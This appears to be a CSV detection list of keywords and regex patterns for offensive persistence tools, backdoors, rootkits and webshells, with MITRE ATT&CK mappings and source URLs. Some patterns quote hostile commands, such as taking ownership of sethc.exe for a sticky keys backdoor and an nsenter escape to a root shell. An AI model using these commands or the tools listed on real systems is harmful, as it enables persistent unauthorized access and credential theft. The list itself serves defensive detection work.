"*SharpEventPersist-main*",".{0,1000}SharpEventPersist\-main.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","370","48","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z"
"*SharpHide running as elevated user*",".{0,1000}SharpHide\srunning\sas\selevated\suser.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","N/A","9","5","474","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
"*SharpHide.csproj*",".{0,1000}SharpHide\.csproj.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","474","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
"*SharpHide.exe*",".{0,1000}SharpHide\.exe.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","474","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
"*SharpHide.sln*",".{0,1000}SharpHide\.sln.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","474","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
"*SharpHide-master*",".{0,1000}SharpHide\-master.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","474","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
"*SharpPersistSD.RegHelper*",".{0,1000}SharpPersistSD\.RegHelper.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*SharpPersistSD.SecurityDescriptor*",".{0,1000}SharpPersistSD\.SecurityDescriptor.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*SharpPersistSD.SvcHelper*",".{0,1000}SharpPersistSD\.SvcHelper.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*SharpStay.csproj*",".{0,1000}SharpStay\.csproj.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*Sharpstay.exe*",".{0,1000}Sharpstay\.exe\s.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*SharpStay.sln*",".{0,1000}SharpStay\.sln.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*SharpStay-master*",".{0,1000}SharpStay\-master.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*shellcode-exec.ps1*",".{0,1000}shellcode\-exec\.ps1.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z"
"*shellcode-runner.py*",".{0,1000}shellcode\-runner\.py.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z"
"*Simple PHP backdoor by DK*",".{0,1000}Simple\sPHP\sbackdoor\sby\sDK.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php text webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*SimShell - Simorgh Security MGZ*",".{0,1000}SimShell\s\-\sSimorgh\sSecurity\sMGZ.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*Small Shell - Edited By KingDefacer*",".{0,1000}Small\sShell\s\-\sEdited\sBy\sKingDefacer.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*SOFTWARE\$77config*",".{0,1000}SOFTWARE\\\$77config.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#registry","registry","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*spaceshuttle.io.all@gmail.com*",".{0,1000}spaceshuttle\.io\.all\@gmail\.com.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#email #linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*Specify -instanceid 1337*Specify -source 'Persistence*",".{0,1000}Specify\s\-instanceid\s1337.{0,1000}Specify\s\-source\s\'Persistence.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","N/A","N/A","10","10","370","48","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z"
"*start /min ""C:\Program Files\Oracle\VirtualBox\VBoxManage.exe"" startvm * -type headless*",".{0,1000}start\s\/min\s\""C\:\\Program\sFiles\\Oracle\\VirtualBox\\VBoxManage\.exe\""\sstartvm\s.{0,1000}\s\-type\sheadless.{0,1000}","greyware_tool_keyword","VirtualBox","Starts VirtualBox in headless mode","T1202 - T1564.001 - T1072","TA0005 - TA0008","N/A","RagnarLocker ","Persistence","https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Start Menu\Programs\Startup\Loader.exe*",".{0,1000}Start\sMenu\\Programs\\Startup\\Loader\.exe.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z"
"*StayKit.cna*",".{0,1000}StayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","470","74","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z"
"*StayKit.exe*",".{0,1000}StayKit\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","470","74","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z"
"*StayKit.git*",".{0,1000}StayKit\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","470","74","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z"
"*Sticky Key backdoor has been removed*",".{0,1000}Sticky\sKey\sbackdoor\shas\sbeen\sremoved.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","32","10","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z"
"*Sticky Keys backdoor added.*",".{0,1000}Sticky\sKeys\sbackdoor\sadded\..{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","32","10","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z"
"*Sticky Keys backdoor does not exist, let's add it*",".{0,1000}Sticky\sKeys\sbackdoor\sdoes\snot\sexist,\slet\'s\sadd\sit.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","32","10","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z"
"*su_brute_user_num*",".{0,1000}su_brute_user_num.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*Suborner.exe*",".{0,1000}Suborner\.exe.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","9","5","468","58","2024-11-20T01:34:44Z","2022-04-26T00:12:58Z"
"*Suborner-master.zip*",".{0,1000}Suborner\-master\.zip.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","9","5","468","58","2024-11-20T01:34:44Z","2022-04-26T00:12:58Z"
"*sudo nsenter -t 1 -m -u -i -n -p -- su -*",".{0,1000}sudo\snsenter\s\-t\s1\s\-m\s\-u\s\-i\s\-n\s\-p\s\-\-\ssu\s\-.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*Sw4mpf0x/PowerLurk*",".{0,1000}Sw4mpf0x\/PowerLurk.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","1","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*SYSTEM\CurrentControlSet\Services\procexp*",".{0,1000}SYSTEM\\CurrentControlSet\\Services\\procexp.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Persistence","https://github.com/trustedsec/The_Shelf","1","0","#registry #servicename","ServiceName","10","3","244","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z"
"*szymon1118/logon_backdoor*",".{0,1000}szymon1118\/logon_backdoor.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*takeown /f c:\windows\system32\sethc.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethc\.exe.{0,1000}","greyware_tool_keyword","takeown","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*takeown /f c:\windows\system32\sethc.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*takeown /f c:\windows\system32\sethcold.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethcold\.exe.{0,1000}","greyware_tool_keyword","takeown","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*takeown /f c:\windows\system32\sethcold.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethcold\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*TheD1rkMtr/Pspersist*",".{0,1000}TheD1rkMtr\/Pspersist.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z"
"*title logon backdoor*",".{0,1000}title\slogon\sbackdoor.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*tomcat-rootprivesc-deb.sh*",".{0,1000}tomcat\-rootprivesc\-deb\.sh.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","1","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*touch /tmp/shim-pwn-success*",".{0,1000}touch\s\/tmp\/shim\-pwn\-success.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq*",".{0,1000}tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","N/A","9","8","731","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z"
"*TransitPathName EvilPathName ServiceName start/stop\*",".{0,1000}TransitPathName\sEvilPathName\sServiceName\sstart\/stop\\.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#content","N/A","4","2","104","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z"
"*Trevohack/DynastyPersist*",".{0,1000}Trevohack\/DynastyPersist.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*Trojan.Linux.SSHDoor*",".{0,1000}Trojan\.Linux\.SSHDoor.{0,1000}","signature_keyword","sshdoor","Openssh backdoor","T1059.003 - T1105 - T1071.001","TA0011 - TA0003","N/A","FANCY BEAR","Persistence","https://web-assets.esetstatic.com/wls/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf","1","0","#Avsignature","N/A","10","9","N/A","N/A","N/A","N/A"
"*Trojan:Win64/r77RootKit*",".{0,1000}Trojan\:Win64\/r77RootKit.{0,1000}","signature_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*tsh_linux_amd64 *",".{0,1000}tsh_linux_amd64\s.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#linux","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*tsh_runshell(*",".*perror\("".*""\)|.*pel_(send|recv)_msg\(.*\)|.*tsh_(runshell|get_file|put_file)\(.*","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#linux #content","N/A","10","6","551","127","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z"
"*tshd_linux_amd64 *",".{0,1000}tshd_linux_amd64\s.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#linux","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*tshd_windows_amd64.exe *",".{0,1000}tshd_windows_amd64\.exe\s.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*uknowsec/CreateService*",".{0,1000}uknowsec\/CreateService.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","1","N/A","N/A","4","2","104","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z"
"*usage_backdoor_user*",".{0,1000}usage_backdoor_user.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*usage_initd_backdoor*",".{0,1000}usage_initd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
